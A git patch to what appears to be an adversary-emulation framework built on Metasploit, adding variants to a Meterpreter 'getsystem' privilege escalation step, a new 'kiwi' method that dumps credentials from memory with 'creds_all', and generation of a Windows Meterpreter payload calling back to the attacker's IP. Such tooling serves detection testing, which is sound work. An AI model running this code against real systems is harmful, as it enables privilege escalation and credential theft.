From 7bce52b02ab3c3794c8a3051dc6aa433ea5aa92c Mon Sep 17 00:00:00 2001 From: Thorsten Sick Date: Fri, 17 Sep 2021 11:37:50 +0200 Subject: [PATCH] Fixing Metasploit getsystem --- app/metasploit.py | 78 +++++++++++++++++-- .../metasploit_getsystem.py | 13 +++- 2 files changed, 82 insertions(+), 9 deletions(-) diff --git a/app/metasploit.py b/app/metasploit.py index 829eac6..0985ba1 100644 --- a/app/metasploit.py +++ b/app/metasploit.py @@ -471,7 +471,7 @@ class MetasploitInstant(Metasploit): tactics=tactics, tactics_id=tactics_id, ttp=ttp) - res = self.meterpreter_execute_on([command], target) + res = self.meterpreter_execute_on([command], target, delay=5) print(f"Result of migrate {res}") self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), @@ -553,19 +553,27 @@ class MetasploitInstant(Metasploit): result=res) return res - def getsystem(self, target, **kwargs): - """ Do a network discovery on the target """ + def getsystem(self, target, variant=0, **kwargs): + """ Do a network discovery on the target + + @param target: Target to attack + @param variant: Variant of getsystem to use. 0 is auto, max is 3 + """ command = "getsystem" ttp = "????" # It uses one out of three different ways to elevate privileges. tactics = "Privilege Escalation" tactics_id = "TA0004" description = """ -Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried: -* named pipe impersonation using cmd -* named pipe impersonation using a dll -* token duplication +Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:\n +0) auto \n +1) named pipe impersonation using cmd \n +2) named pipe impersonation using a dll \n +3) token duplication\n """ + + if variant != 0: + command += f" -t {variant}" # https://docs.rapid7.com/metasploit/meterpreter-getsystem/ self.attack_logger.vprint( @@ -762,3 +770,59 @@ Uploading new files to the target. Can be config files, tools, implants, ... logid=logid, result=res) return res + + def kiwi(self, target, variant="creds_all", **kwargs): + """ Kiwi is the modern equivalent to mimikatz + + @param target: target being attacked + @param variant: kiwi command being used + """ + + ttp = "t1003" + tactics = "Credential access" + tactics_id = "TA0006" + description = """ +Accessing user credentials in memory +""" + + res = [] + + self.attack_logger.vprint( + f"{CommandlineColors.OKCYAN}Preparing for Kiwi{CommandlineColors.ENDC}", 1) + + # We need system privileges + self.getsystem(target, 0, **kwargs) + + # Kiwi needs to be loaded + command = "load kiwi " + res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10)) + + # Executing kiwi + command = f"{variant} " + + self.attack_logger.vprint( + f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) + + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="kiwi", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", + None), + countermeasure=kwargs.get("countermeasure", None) + ) + res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10)) + + self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + logid=logid, + result=res) + + print(res) + return res diff --git a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py index d05dfa5..8a32fc9 100644 --- a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py +++ b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py @@ -4,6 +4,7 @@ from plugins.base.attack import AttackPlugin from app.metasploit import MetasploitInstant +import socket class MetasploitGetsystemPlugin(AttackPlugin): @@ -37,12 +38,20 @@ class MetasploitGetsystemPlugin(AttackPlugin): attacker=self.attacker_machine_plugin, username=self.metasploit_user) + ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) + metasploit.smart_infect(target, payload=payload_type, - payload_name=payload_name, - architecture="x64") + architecture="x64", + platform="windows", + lhost=ip, + format="exe", + outfile=payload_name) + + # TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70 metasploit.getsystem(target, + variant=self.conf['variant'], situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." )